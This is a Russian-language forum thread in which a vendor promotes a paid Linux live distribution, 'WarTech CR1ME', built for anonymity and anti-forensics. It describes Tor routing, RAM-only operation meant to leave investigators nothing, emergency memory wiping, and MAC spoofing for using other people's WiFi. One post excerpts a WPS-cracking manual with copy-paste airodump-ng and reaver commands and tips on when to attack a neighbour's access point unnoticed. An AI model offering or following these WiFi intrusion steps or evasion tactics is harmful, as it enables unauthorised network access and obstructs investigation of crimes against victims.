WarTech CR1ME уникальные операционные системы (security focused operational systems) Linux/Android

Тема в разделе "Безопасность и анонимность", создана пользователем WarTech, 4 янв 2018.

  1. WarTech Support

    WarTech Support New Member

    Сообщения:
    28
    Симпатии:
    0
    Новости!

    Друзья!

    Наш проект подошел к новому рубежу - полный переход от образов диска размером от 8 до 16 гигабайт к дистрибутиву, размером менее одного гигабайта. Что это дает клиентам?

    Во-первых, это удобство при загрузке. Образы мы размещаем на onion хостингах, скорость скачивания с которых не превышает 500 килобайт в секунду. Так что загрузга образа флешки размером 16 гигабайт занимала несколько дней. Теперь же на загрузку образа будет уходить не более двух часов.

    Во-вторых. это возможность запускать CR1ME на виртуальной машине - в дистрибутиве предустановлены пакеты virtualbox-guest-utils, которые дадут возможность работать в полноэкранном режиме, полностью погружаясь в рабочую среду.

    В-третьих, это дает возможность работать в RAM режиме, загружая образ в оперативную память. После полной загрузки флешку можно извлекать и работать на машине без жесткого диска и флекши - вся система полностью записывается в оперативку. После выключения машины через 5-7 минут она обнулится, и учитывая полное отсутствие каких либо носителей исследовать эксперту-криминалисту просто нечего.

    Система полностью настроена и в ней предустановлены все нужные программы - как и в старом CR1ME. Для начала работы в нее нужно скопироваль лишь базу паролей keepassx и папку с залогиненой телегой - как это сделать мы обучаем.

    В отличии от старого крайма, который собирался на пакетной базе kali linux, крайм 2.0 более стабильный и собран на пакетной базе Debian 9 Strecth. Из сторонних пакетов добавлены только лишь свежий аудитор уязвимостей Lynis, i2p роутер и атакующие пакеты для работы с wifi.

    В процессе создания пришлось решить ряд невероятно сложных задач, однако нам удалось отыскать исходники T.A.I.L.S. для live-build, самый настоящий конструктор для сборки тэйлс! Там и нашлись ответы на многие нерешенные проблемы:

    1. неработающие мосты тора - проблема была в Ссылка доступна только зарегистрированным пользователям. После фикса тор в новом крайме маскируется не только узлами obfs4, но и obfs3, а главное мостами scramblesuit! Именно они лежат в основе obfs4, и в отличии от них мостовые узлы scramblesuit умеют определять роботов, пингующих сервера для того чтобы занести их в блек листы и игнорируют их пинг запросы. А посему они более стабильные и долговечные и выдаются по 1 штуке на сайте bridges.torproject.org.

    2. проблема с конфигами tor и фаервола ferm. в полной установке тор запускается как процесс debian-tor, в лайве же он запускался как root и его не пропускал ferm

    3. Проблема с профилем aparmor для тора - после команды рестарт аппармор не давал тору доступа к папке /var/lib/tor и сервис не мог перезапуститься.

    и многие многие другие.

    Но сейчас все это уже позади. Система готова на 80 процентов - самое главное - это политики айпитейблс и тор уже настроены, и все работает идеально. Остались мелочи - запитать через тор антивирус, укрепить систему по lynis до индекса хотя бы 80 и в общем то все. Можно будет открывать продажи.
  2. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    Ссылка доступна только зарегистрированным пользователям

    НОВОСТИ

    WarTech CR1ME 2.0 собран и обкатан. Пока в продажу поступит только ARMOR версия - облегченная. Это если сравнивать с полной, боевой. Если же с равнивать с конкурентами, то наша облегченная версия перекрывает любую систему из аналогичных на рынке.

    Почему 2.0, а не 1.4?

    Главное отличие - переход от продажи образов настроенной флешки (цифровой копии чипа памяти) на продажу дистрибутива. Дистрибутив - это установочный изогибридный образ, например как вы скачиваете T.A.I.L.S. или Ubuntu - iso файл размером 1.2 гигабайта. Только скачав наш дистрибутив вы получите не унылый десктоп Ubuntu с омерзительным интерфейсом и глупыми программами, а кастомный, тяжелобронированный линукс, который собирался под конкретные тактические задачи, имеющий на борту всё для их решения, и ничего что с ними не связано.

    Плюсы этого нововведения очевидны:

    1. Вместо образа размером 8 или 16 гигабайт теперь нужно скачать дистрибутив размером 1 гигабайт.

    2. При установке системы на флешку все свободное пространство будет использоваться под шифрованное хранилище данных. То есть если записать новый CR1ME на флешку размером 512 гигабайт - то почти все это место будет доступно в системе под ваши нужды.

    3. Теперь систему можно запускать в VirtualBox - в ней предустановлены необходимые пакеты для работы в режиме Full Screen - для полного погружения в рабочую среду.

    4. Так же теперь полностью функционален RAM режим - загрузка системы в оперативную память. После входа в систему USB накопитель можно извлекать без проблем. После обесточивания машины оперативная память обнулиться через 5-7 минут. Однако в полной версии будет доступна функция принудительной очистки памяти.

    Основные тактико-технические характеристики 2.0A:

    1. Собрана на 9 Debian. Версия 1.X собиралась на Kali - который по сути 10 Debian - нестабильная версия в которой пока 2500+ критических багов. Изучив перечень неработающих пакетов стало ясно, что пока все таки рано собирать систему на десятке, и мы ограничились лишь установкой нескольких пакетов из нее (tor + пакеты обеспечивающие безопасность)

    2. Полностью переработана торификация, теперь это полностью наша уникальная разработка, хотя откровенно говоря она лишь компиляция решений из других дистрибутивов:

    Весь трафик системы перенаправлен через тор роутер. Через тор идет абсолютно все без исключений - даже трафик i2p роутера. Реализоваи мы это через настройку iptables взяв за основу конфиги из проекта Parrot Security Linux. Однако в Parrot это shell script и он запускается примерно на 40 секунде. У нас же торификация управляется модулем ядра, и маршрутизация происходит уже на 8й секудне, сразу после того как биос опросит железо. Таким образом на момент загрузки системы трафик уже отрезан и перенаправлен в тор роутер, так что какие либо утечки полностью исключены.

    Любая установленная вами программа автоматически будет работать через тор - даже если в ней нет настроек прокси. Без всяких proxychains или torsocks.

    3. Оттуда же позаимстована система управления тором (смена ip адреса с указанием конкретной страны. А так же фунции проверки текущего ip адреса, смены hostname и mac адресов.

    Другие решения удалось воплотить в жизнь благодаря тому, что нам удалось получить исходники T.A.I.L.S. - конструктор для live-build - самостоятельной сборки. Оттуда мы позаимствовали следующие решения:

    1. Торификация DNS запросов - управляющий этим процессом по умолчанию network-manager больше не прописывает адреса dns серверов. Вместо этого все запросы перенаправляются на порт 5353 тора.

    2.DHСP сервис так же лишен возможности резолвить dns, а так же транслировать hostname системы.

    3. Удалось пофиксить баг с обфускацией тора- теперь в торе корректно работают не только obfs4 мосты, но и obfs3, fte и главное - sramblesuit.

    Scramblesuit протокол уникален тем, что он первый стал обходить даже великий китайский фаервол. Который до появления scramblesuit успешно блочил тор благодаря целой сети активный сканеров - обнаружив во время DPI трафик похожий на тор, сканер пытался подключиться к узлу, и если получал характерный ответ тут же заносил адрес моста в черный список.

    Scramblesuit же формирует неповторимый почерк каждого узла, делая трафик уникальным по составу пакетов. Таким образом сканеры не могут понять по почерку что перед ними тор мост.

    4. Удалось пофиксить баг в RAM режиме - при работе из оперативной памяти при блокировке экрана система падала. Теперь блокировка работает корректно.

    5. Удалось пофиксить баг, из за которого при работе с крайма не удавалось открывать зашифрованные жесткие диски.

    Прочее:

    Индекс прочности в облегченном CR1ME - 80+

    Для работы установлены:

    CoyIM - бронированная жаба
    Firefox - с кастомными настройками (хотя скорее всего таки его заменит тор браузер)
    Ricochet - самый безопасный мессенджер на данный момент (вывод сделан на основе независимого аудита безопасности, который есть в сети)
    2 клиента Telegram - настроеных независимо друг от друга
    Electrum - биткойн кошелек
    Exodus - мультивалютная криптобиржа - доступно около 90 криптовалют, есть обменник внутри приложения (но менять можно только крипту на крипту)
    MAT - пакет уничтожения метаданных
    GIMP -графический редактор
    Clamtk - антивирус
    Keepassx - менеджер хранения паролей
    Zulucrypt - пакет управления криптоконтейнерами (веракрипт, трукрипт и т.п.)
    Bleachbit - пакет очистки системы от мусора а так же для безвозвратного уничтожения данных.

    И многое другое...

    Кастомизирован файл-менеджер - в меню правой кнопки добавлены функции открыть как администратор, проверить на вирусы и поиск.

    И наконец, сегодня ночью удалось решить последнюю, финальную проблему - 9 Debian после записи на флешку не позволяет использовать оставшееся место под персистенс. В итоге был найден уникальный метод ручной разметки и установки лайв системы и загрузчика, который мы автоматизировали для удобства.

    В общем WarTech CR1ME 2.0 ARMOR - наконец то поступил в продажу. По всем вопросам можно писать в джаббер Ссылка доступна только зарегистрированным пользователям или рикошет ricochet:k27umw3ltjo3wdew
  3. WarTech Support

    WarTech Support New Member

    Сообщения:
    28
    Симпатии:
    0
    Друзья!

    Версия 2.0 лайт доступна для скачивания с хостинга. Она полностью обкатана и работоспособна. За последнее время произошли следующие изменения:

    1. Как и планировалось, Firefox-esr уступил место Tor Browser. Причем для учетной записи он уже предустановлен в виде tar - архивов, и его не нужно скачивать каждый сеанс заново. Torbrowser - launcher скачивает лишь цифровую подпись - чтобы удостовериться что архив из первоисточника и потом сразу его распаковывает и запускает браузер.

    2. Решна проблема с загрузкой в UEFI режиме - теперь не нужно будет настраивать биос под легаси - система загружается как в легаси режиме так и в новом уефи.

    3. Привели в порядок интерфейс - несколько иконок были цветными, так как в айкон-паке monotone не было их серо-белых аналогов. В итоге пришлось убирать цвет вручную.

    4. Фунции проверки IP адреса и смены выходных узлов тора с выбором конкретной страны с панели перенесены в основное меню, подраздел Интернет. Туда же добавлен ярлык для tor-arm, консоли управления тором.

    Загрузчики позволяют запускать систему в четырех режимах:

    1. Live - лайв версия системы без сохранения сеансов.
    2. Live failsafe - аварийный режим запуска, для диагностики повреждений и/или для восстановления поврежденной системы.
    3. Ram - загрузка системы в оперативную память, флешку после полной загрузки можно извлеч что бы освободить порт. Скорость чтения/записи системы в таком режиме - около 2 Гб в секунду (для сравнения - быстрые флешки 3.0 в порту 3.0 выдают максимум 150-200 Мб на чтение и лишь 40-60 Мб на запись)

    Внимание - для работы в Ram режиме нужно минимум 4 Гб оперативной памяти!

    4. Live encrypted persistence - режим с сохранением всех без исключения изменений в системе. Файлы и настройки хранятся на шифрованном разделе с возможностью удаления ключей шифрования как из самой системы, так и при запуске или же при подключении флешку в другой линукс просто как носитель (уничтожить ключи из виндоус не получится, так как она не понимает такую файловую систему, и соответственно не запросит пароль на открытие контейнера).

    Размер образа - всего 846 мегабайт. Устанавливать его можно на флешку, сд карту, микро сд карту (для карт нужен усб-кардридер или же модем со слотом под микросд). Так же можно его записывать и на жесткие диски. При этом все оставшееся пространство будет использовано под систему - записав образ на флешку 128 гб - в системе будет примерно столько же свободного места для хранения файлов или установки дополнительных программ.

    Напоследок напишу еще про один плюс перехода от образов флешки на дистрибутив - при покупке флешки или ее образа там настроена только одна учетная запись. Вновь созданные учетные записи будут настроены по дефолту, то есть незащищены. В крайме же все пользовательские настройки беруться из самой системы - изменены базовые конфиги. В итоге что учетная записб юзеров, что рута - все они одинаково настроены, имеют одинаковый интерфейс и т.п. А значит при повреждении какой то учетной записи нет необходимости перезаписывать флешку и уж тем более покупать заново. Достаточно создать учетную запись user2 - перенести туда свои файлы и работать дальше. Весь процесс переезда занимает 7-10 минут максимум.

    По всем вопросом писать в jabber: Ссылка доступна только зарегистрированным пользователям , Ссылка доступна только зарегистрированным пользователям
    ricochetIM: ricochet:k27umw3ltjo3wdew
    Или ЛС форума.
  4. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    НОВОСТИ

    откроем немного технических подробностей новой системы:

    1. В версии 2.0 появилась новая защитная фунция - warguard. Активировав ее при первом запуске вы сформируете перечень авторизованных usb устройств, после чего любые чужие устройства будут блокироваться ядром. Разумеется правила можно менять, и при покупке, скажем, нового адаптера его можно будет добавить в список. В первую очередь эта фунция защищает от атак с помощью badusb - боевых флешек, которые расчитаны на системы с автомонтированием, такие как Ubuntu и прочие десктопы. Там по дефолту при подключении носителя он монтируется автоматом и открывается проводник, что и эксплуатируют злые флешки. Даже если экран заблокирован, боевая флешка может наделать много бед и горя.

    2. Все без исключения режимы дистрибутива загружаются с опциями noswap и noautomount - для предотвращения утечки данных на другие носители.

    3. Для этой же цели был установлен и настроен модуль memlockd - который запирает выбранные разделы системы в оперативной памяти, не давая им протекать из нее на носители.

    Так же спешим сообщить - полная версия 2.0 готова и в течение суток уже будет доступна для скачивания. Размер образа - 1.1 гигабайт.

    Основные отличия полной версии от лайта:

    1. Индекс прочности системы - 89 (против 79 в лайте)
    2. Новая фунция warguard
    3. Полуавтоматическая крупнокалиберная пушка для работы с WiFi - airgeddon 8.10
    4. Полный набор криптокошельков - electrum, monero, exodus
    5. Автоматический защитный модуль против mitm атак, атак подмены днс.
    6. Два независимых клиента Telegram
    7. Пакет для работы с криптоконтейнерами с поддержкой truecrypt и veracrypt
    8. Установлен модуль контейнерной изоляции firejail - с профилями под практически все пакеты, что есть в системе.
    9. В образе сконфигурирован каталог /etc/skel - шаблон создания новых пользователей. Все новые учетные записи автоматом будут получать все настройки безопасности всех программ. Всего можно создать 99 независимых учетных записей + учетка рута.

    Плюс к этому мы автоматизировали процесс создания флешки с персистенс разделом - если кто то предпочитает работу по старинке - с шифрованной флешки вместо более безопасного в плане форензики режима работы из оперативной памяти, без каких либо носителей данных - то создать такую флешку теперь проще простого. Достаточно скачать наш образ, автоматический скрипт и запустить его в любом линуксе. Скрипт сам создаст схему разметки, запишет образ и установит два загрузчика - syslinux для классического биоса и grub для UEFI режима. Вам лишь останется в процессе дважды ввести пароль, которым будет открываться шифрованный раздел.

    Чуть позже добавлю скрины из 2.0 full
  5. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    НОВОСТИ

    откроем немного технических подробностей новой системы:

    1. В версии 2.0 появилась новая защитная фунция - warguard. Активировав ее при первом запуске вы сформируете перечень авторизованных usb устройств, после чего любые чужие устройства будут блокироваться ядром. Разумеется правила можно менять, и при покупке, скажем, нового адаптера его можно будет добавить в список. В первую очередь эта фунция защищает от атак с помощью badusb - боевых флешек, которые расчитаны на системы с автомонтированием, такие как Ubuntu и прочие десктопы. Там по дефолту при подключении носителя он монтируется автоматом и открывается проводник, что и эксплуатируют злые флешки. Даже если экран заблокирован, боевая флешка может наделать много бед и горя.

    2. Все без исключения режимы дистрибутива загружаются с опциями noswap и noautomount - для предотвращения утечки данных на другие носители.

    3. Для этой же цели был установлен и настроен модуль memlockd - который запирает выбранные разделы системы в оперативной памяти, не давая им протекать из нее на носители.

    Так же спешим сообщить - полная версия 2.0 готова и в течение суток уже будет доступна для скачивания. Размер образа - 1.1 гигабайт.

    Основные отличия полной версии от лайта:

    1. Индекс прочности системы - 89 (против 79 в лайте)
    2. Новая фунция warguard
    3. Полуавтоматическая крупнокалиберная пушка для работы с WiFi - airgeddon 8.10
    4. Полный набор криптокошельков - electrum, monero, exodus
    5. Автоматический защитный модуль против mitm атак, атак подмены днс.
    6. Два независимых клиента Telegram
    7. Пакет для работы с криптоконтейнерами с поддержкой truecrypt и veracrypt
    8. Установлен модуль контейнерной изоляции firejail - с профилями под практически все пакеты, что есть в системе.
    9. В образе сконфигурирован каталог /etc/skel - шаблон создания новых пользователей. Все новые учетные записи автоматом будут получать все настройки безопасности всех программ. Всего можно создать 99 независимых учетных записей + учетка рута.

    Плюс к этому мы автоматизировали процесс создания флешки с персистенс разделом - если кто то предпочитает работу по старинке - с шифрованной флешки вместо более безопасного в плане форензики режима работы из оперативной памяти, без каких либо носителей данных - то создать такую флешку теперь проще простого. Достаточно скачать наш образ, автоматический скрипт и запустить его в любом линуксе. Скрипт сам создаст схему разметки, запишет образ и установит два загрузчика - syslinux для классического биоса и grub для UEFI режима. Вам лишь останется в процессе дважды ввести пароль, которым будет открываться шифрованный раздел.

    Чуть позже добавлю скрины из 2.0 full
  6. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    ^ криптоналичман

    ^ инструментарий для попи*делочек с клиентами и партнерами (не теми партнерами которые которых, нувыпонели...)
  7. WarTech Support

    WarTech Support New Member

    Сообщения:
    28
    Симпатии:
    0
    ^ Полдня потратил на переделку индикации на рабочем столе. Добавил отображение следующих параметров:

    1. Общий объем скачанного/закачанного трафика, уровень сигнала вифи, хостнейм (для контроля анонимной работы через чужие точки)

    2. Развел эти параметры для разных интерфейсов - wlan0 wlan1 (адаптеры вифи) eth0 eth1 (сетевые карты и модемы) usb0 (раздача с андроида). Теперь при подключении второго интерфейсам появится его отдельные параметры)

    3. Процент свободного места на носителе - чтобы не прозевать заполнения флешки под горлышко" (при 0 байт свободного места система не стартанет, пока не очистить ей место под маневры)

    4. Вывел список горячих клавиш, а то как показывает практика не все клиенты вообще в курсе, что у них в системе есть

    5. Дизайн сделал полупрозрачным и менее резким - белыми остались только ключевые параметры, остальное сделал цветом #777777 (светло светло серый).

    п.с. раньше когда система была на анонсерфе я мечтал научится делать айпишку зеленой, если ты в торе и красной, если в чистом сеансе. сегодня таки понял как запилить такие чудеса - но уже как назло не надо, ибо система в торе перманентно и в чистую выйти просто нереально из за схемы маршрутизации и монополии тора в плане резолва днс имен.
  8. WarTech Support

    WarTech Support New Member

    Сообщения:
    28
    Симпатии:
    0
    [​IMG]

    ^ Наглядный пример работы айпитейблс-персистент. В телеге не прописан тор прокси, но при запуске она автоматом идет через тор и айпишка ее определяется как голландская. хотя в прошлый запуск, как видно, была пиндосская.

    Таким же образом будут работать все вновь установленные пакеты - эти ваши всякие виполы и прочие реально непонятные вещи.
  9. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    НОВОСТИ.

    Поскольку нюк пароль, уничтожающий ключи шифрования не нужен в лайв и рам режимах я планировал написать скрипт отдельно для тех, кто будет делать флешку с шифрованным персистенсом. Но как оказалось апгрейд персистенс системы приводит к полному отказу криптсетапа. В итоге пришлось экстренно собирать версию 2.1.1 в которой криптестап от кали уже предустановлен в лайве.

    Из незначительных изменений в 2.1.1 - в системе предустановлен и настроен языковой модуль, который во первых делает не нужной настройку клавиатуры - при первом же запуске в системе уже есть и русская и английская раскладка, с переключением всем привычной комбинацией alt+shift. Во вторых этот модуль делает независимую раскладку для каждого языка - например если в телеграме русский, а в терминале английский, то при переключении между окнами нужная раскладка будет устанавливаться автоматически, экономя время на переключениях и исключая неловкие ситуации, когда текст набран не на том языке.

    Максимальная версия 2.1 так же уже собрана. Индекс прочности, как и обещал, в ней повысился с 88 до 91 пункта - в первую очередь за счет ужесточения политик usbguarda, и ограничения доступа к процессам, запущенным от других пользователей.

    Работы над лайт версией временно приостановлены, поскольку я наконец то ей доволен. Все там так, как мне всегда хотелось, работаю и не нарадуюсь, настолько удачная вышла сборка. Работа же над тяжелой версией пока продолжается - как минимум нужно закончить адаптацию в системе напарницы apparmora - модуля контейнерной изоляции FireJail

    ФайрДжейл - она же Огненная Клетка - это песочница. Программа, которая основана на важной технологии unix подобных систем - userspace (пользовательское пространство). Если в кратце, то каждому пользователю система отводит лишь часть виртуальной памяти, и без острой необходимости он не может получть доступа к областям других пользователей (под пользователем в данном случае подразумеваются не люди, а юзеры - например сервис тор запускает юзер debian-tor).

    Так вот Клетка убирает оговорки без острой необходимости и ужесточает политики доступа даже к позволенным участкам памяти. Таким образом при запуске программы внутри Клетки у нее очень сильно урезаются права и полномочия - она может смореть лишь свои папки и конфигурационные файлы, не может запускать файлы как программы типа exec (аналог exe в Виндоус) и т.п.

    В первую очередь я планирую перенос в клетки всех сетевых программ - браузеров, мессенджеров и т.п. Далее планируется перевод в режим --net=none (в котором полностью отрезается доступ к сети) программ и процессов, которым не обязательно иметь доступ к интернету - все программы из раздела Графика Мультимедия Системные и т.п.

    Так же планирую в полную версию включить полный мануал по взлому точек доступа, с живыми примерами и пояснениями как там и что, и разумеется с готовыми командами, которые можно тупо копировать в терминал, если нет времени/желания вникать в подробности. Мануал написан вот в таком формате.

    Код:
    # Запускаем сканер:

    airodump-ng -a -W -U -M wlan1mon


    терминал:
    -----------------------------------------------------------------------------
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH UPTIME WPS ESSID MANUFACTURER

    C8:91:F9:XX:XX:XX -51 99 33 0 9 130 WPA2 CCMP 5d 16:17:26 2.0 XXXXXXXXXXXXXXXX Sagemcom Broadband SAS (<- в список)
    1C:74:0D:XX:XX:XX -53 87 3 0 2 270 WPA2 CCMP 0d 17:53:50 Locked XXXXXXXXXXXXX ZyXEL Communications Corporation (<- не подходит)
    AC:64:62:XX:XX:XX -57 81 0 0 1 270 WPA2 CCMP 0d 17:32:05 0.0 XXXXXXXXXXXXXXXX zte corporation (<- не подходит)
    AC:F1:DF:XX:XX:XX -59 82 134 0 6 270 WPA2 CCMP 3d 05:55:46 XXXXXXXXXXXX D-Link International (<- не подходит)
    F8:1A:67:XX:XX:XX -60 33 5 0 1 270 WPA2 CCMP 0d 00:11:40 1.0 ETHER,LAB,PBC XXXXXXXXXXXXXX TP-LINK TECHNOLOGIES CO.,LTD. (<- в список)
    -----------------------------------------------------------------------------

    # Выписываем BSSID и канал точек доступа с незалоченым активным WPS в текстовый файл (для атаки не подходят точки у которых в колонке WPS пусто, 0.0 или locked, остальные можно пробовать):

    C8:91:F9:XX:XX:XX 9
    F8:1A:67:XX:XX:XX 1

    # Переводим сканер в режим мониторинга одной точки и смотрим на колони #Data и Frames:

    airodump-ng -a -W -U -M wlan1mon -c 1 --bssid F8:1A:67:XX:XX:XX


    терминал:
    -----------------------------------------------------------------------------
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH UPTIME WPS ESSID MANUFACTURER

    C8:91:F9:XX:XX:XX -52 100 4197 1068 7 9 130 WPA2 CCMP 5d 17:04:00 2.0 DISP XXXXXXXXXXXXXXXX Sagemcom Broadband SAS

    BSSID STATION PWR Rate Lost Frames Probe

    C8:91:F9:XX:XX:XX 58:E2:8F:XX:XX:XX -1 0e- 0 0 24 (< -пакетов почти нет)
    C8:91:F9:XX:XX:XX 44:78:3E:XX:XX:XX -1 0e- 0 0 606 (< -есть передача данных)
    -----------------------------------------------------------------------------

    ^В данный момент точку атаковать нельзя, так как владелец пользуется интернетом. Откуда такой вывод? Ну если бы он не пользовался интернетом, то в колонке #Data было бы не 1068 пакетов, а 20-30. А если бы он просто что то поставил на закачку и ушел то там было бы не 1068 пакетов а 15000-20000. Если же в колонке #Data 20-30 пакетов которые еле еле приростают - можно атаковать смело, но следить на мониторе за процессом.

    # Пробуем первую точку во втором терминале (так же сначала там выполняем команду sudo -s, ривер же запускаем без опции -Z):

    reaver -i wlan1mon -b C8:91:F9:XX:XX:XX -c 9 -vv -N
  10. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
  11. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    НОВОСТИ

    Собрана и обкатана версия WarTech CR1ME 2.2A

    Что изменилось в этой версии:

    1. Образ теперь можно записывать любой программой: Disks, dd, Rosa Image Writer, Etcher. При этом все свободное место можно использовать под персистенс. Решение оказалось простым - вместо iso-hybrid образ стал usb-hdd.

    2. Загрузчик syslinux (extlinux) установлен в сам образ. Так что теперь и bios и uefi режимы доступны независимо от того есть ли на флешке персистенс раздел или нет.

    3. В правую кнопку проводника добавлена функция удаления с перезаписью - для гарантированного уничтожения информации. Для защиты от миссклика так же добавил диалогове окно да/нет:



    4. В системе теперь есть почтовый клиент Thunderbird с плагинами TorBirdy и Enigmail. Сконфигурирован как в T.A.I.L.S., однако я добавил еще несколько опций к их конфигу, которые на мой взгляд нужны:

    Код:
    # Прокси:
    pref(network.proxy.socks, 0.0.0.0);
    pref(network.proxy.socks_port, 9050);
    pref(network.proxy.socks_remote_dns, true);

    # Отключение проверки правописания:
    pref(mail.spellcheck.inline, false);

    # Отключения отправки отчета об ошибках:
    pref(datareporting.healthreport.service.enabled, false);
    pref(datareporting.healthreport.uploadEnabled, false);
    pref(datareporting.policy.dataSubmissionEnabled, false);

    # Время в каледнаре по умолчанию:
    pref(calendar.timezone.local, Europe/Moscow);

    # Отключение истории:
    pref(places.history.enabled, false);


    5. Переработана функция экстренного завершения работы. Теперь при нажатии комбинации клавиш ctrl+alt+del система не просто выключается, а предварительно затирает данные в оперативной памяти. Это важно вот почему. Оперативная память хоть и энергозависима, но обнуляется она не сразу, а минут через 7-10 после прекращения подачи электропитания. Если сразу же после завершения рабочего сеанса вытащить флешку и включить ноутбук, загрузившись с жесткого диска - то есть риски что куски данных из оперативки могут попасть в чистую систему и попадут в ее логи.

    6. Появилось информационное окно, сообщающее о полной загрузке системы. При работе из оперативной памяти флешку можно извлекать не сразу, а когда система полностью загрузится. Теперь не нужно гадать уже можно или еще нет.

    7. Окна при проверке IP адреса и загрузки системы теперь сами закрываются через 10 секунд, если не была нажата кнопка OK.

    8. Добавлен пакет для работы с MTP протоколом - поскольку система защищена от атак BADUSB при подключении к ней Android устройства ровным счетом ничего не происходит и оно не появляется в системе. Теперь можно подключить смартфон в ручном режиме.
  12. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    НОВОСТИ:

    Собрана версия 2.3. Что улучшилось:

    1. В виду катастрофической нехватки времени от поддержки двух версий системы пришлось отказаться. Начиная с версии 2.3 будет только один дистрибутив - WarTech CR1ME.

    2. Продолжаются работы по переносу важных защитных модулей на более ранние тайминги. Вслед за переносом торификации с 40 секунды загрузки на 8 (что исключило даже системные утечки) так же перенесено отключение протокола IPv6. Теперь аудитор безопасности Lynis при проверке проверке системы пришет что протокол Disabled, а в параметрах подключения к интернету графа с IPv6 адресом пустует.

    3. По просьбам телезрителей добавлены аналоги Майкрософт Офиса для открытия и редактирования таблиц и текстовых документов.

    4. И, наконец, наверное одно из самых важных нововведений - оборонный модуль защиты конфигурации USB устройств. Изначально я планировал реализовать защиту машины от атак типа BadUSB через установку и настройку модуля usbguard и деактивацией автоматического открытия подключаемых устройств. Что в общем то я и сделал уже в версии 2.1.1. Однако же поюзав какое то время я пришел к выводу что схема далека от идеала. При этом попутно я уже реализовал горячие клавиши на экстренное отключение машины с предварительным уничтожением данных в оперативной памяти. В общем после двух суток я с гордостью готов рассказать об новом листе брони в моем линуксе.

    Кратко суть:

    Новый модуль объединяет в себе следущие защитные функции:

    1. Отключает машину при извлечении флешки (как это реализовано в тейлс)
    2. Затирает данные в оперативной памяти (как это реализовано в тейлс)

    Думаете я просто повторил решения из тейлс? АВОТХУЙ!

    3. Модуль так же затирает кэши всех рабочих программ без возможности восстановления
    4. Модуль так же затирает специальный криптоконтейнер, в котором хранится критическая информация (например в режиме работы из оперативки)
    5. Модуль следит за ВСЕМИ усб устройствами, и активируется ПРИ ЛЮБОМ ИЗМЕНЕНИИ конфигурации усб портов. Например, вероятный противник для предотвращения срабатывания локскрина использует эмуляторы мыши - небольшой девайст подключается в усб порт и дрочит курсор, не давая машине заблокироваться, и как я уже писал выше для атак используются и специальные боевые флешки, которые могут при активации атаковать машину по разным векторам - он занесения зловредов до изменения маршрутизации (перенаправляет весь трафик через себя, анализируя его). Последний вид атак кстати доступен и для андроид смартфонов - для проведения атаки человек посередине достаточно лишь скачать скрипт на свой смартфон и незаметно подключить его к атакуемой машине.

    Таким образом новый защитный модуль ПРИ ЛЮБОМ ИЗМЕНЕНИИ стартовой конфигурации усб устройств - не важно вытащили ли флешку с краймом, или же кто то вставил что то непонятное в ваш ноутбук - тут же отреагирует уничтожением критической информации и экстренно выключит машину.

    FUCK YOU TAILS! MAKE IT BETTER!
    --- Посты объеденены ---
    Кстати, тестировал тут новый дистрибутив из оперы тейлс - heads. Так вот там тоже предустановлены некоторые пакеты для взлома вайфай. Так что я еще раз убедился, что двигаюсь в верном направлении.

    п.с. правда там ядро от грсека, которое не дает работать с боевыми адаптерами, вот ирония то
  13. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    НОВОСТИ

    Вышла версия 2.4 - она уже доступна для скачивания. Вместо описания изменений, в этот раз подробный обзор:

    Скорость работы:

    - Скорость загрузки системы - менее 60 секунд (за исключением первого запуска в режиме Persistence (с шифрованным разделом, в котором сохраняются все файлы и изменения в системе) в процессе которого на флешке создается домашняя папка нового пользователя - там скорость сильно зависит от носителя и первая загрузка может длится до 3 минут). О том как создать такой раздел написано тут:

    Ссылка доступна только зарегистрированным пользователям

    - Скорость работы в RAM режиме мгновенная. Считывание и запись данных происходит на скорости 2.5 гигабайта в секунду. Для сравнения - быстрые SSD диски имеют скорость чтения/записи 300-300 мегабайт в секунду, быстрые флешки интерфесов 3.0 и 3.1 имеют скорость 150/50 мб в секунду соответсвенно.

    - Функции проверки IP и выбора страны для выходной ноды продублированы на горячие клавиши.

    - Размер образа дистрибутива - 1.3 гигабайта. Скачивание его с тора занимает около часа. Еще час уходит насоздание персистенса и обучение основным элементам системы. Таким образом можно приступить к работе уже через 2-3 часа после проведения оплаты, не тратя время на ожидание доставки и не рискуя при получении физического товара.

    Удобство:

    - Система полностью настроена. Даже лайв режим и режим работы из оперативной памяти уже включают в себя все нужные программы и настройки - настроена дажа клавиатура - из коробки уже установлен русский язык и горячие клавишы смены раскладки - alt + shift.

    - Раскладка клавиатуры меняется автоматически при выборе окна. Выбрав Telegram и установив там русский язык, вы закрепите за ним эту конфигурацию. Если потом выбрать браузер и ввести на английском адрес сайта, а потом опят вернуться в Telegram - язык изменится на русский автоматически. Так что нажимать alt+ shift практически не приходится.

    - Интерфейс системы интуитивно понятен и мало чем отличается от других операционных систем. Разве что цветом и панелью сверху, а не снизу. То, что я на скриншотах показываю в основном окна терминала, не значит что там вам придется что то делать часто - просто я не вижу смысла показывать там что то обычное и скучное, типа запуска обычных программ:

    - Текущий IP адрес всегда можно посмотреть на индикаторах в верхней правой части рабочего стола, или же проверив его нажав super + q или на пунтк в меню, в подразделе internet:

    - В отличии от T.A.I.L.S и прочих систем - тор полностью управляем, и позволят выбирать страну для IP адреса. Так что вы всегда можете зайти на сайт под IP конкретной страны.

    Менять адрес случайным образом тоже возможно - причем как отдельно для браузера, так и для всей машины.

    - Есть два монитора цепей Tor - консольный и с графикой. В них всегда можно посмотреть по каким узлам идет джаббер, а по каким телеграм. Так же есть утилита для получения подробной информации о выходном узле, если у вас есть сомнения на его счет.

    - В проводник добавлены опции поиска, проверки файлов и папок на вирусы, безвозвратное уничтожение а так же опция открытия папкок с правами суперпользователя - для быстрого редактирования системных файлов.

    Анонимность:

    - MAC адреса сетевых устройств автоматически изменяется при подключении, а имя компьютера больше не передается через DHCP, вместо него в логах в графе host-name так же отображается измененный MAC адрес. Таким образом я полностью исключил утечку каких либо идентификаторов при работе через чужой WiFi.

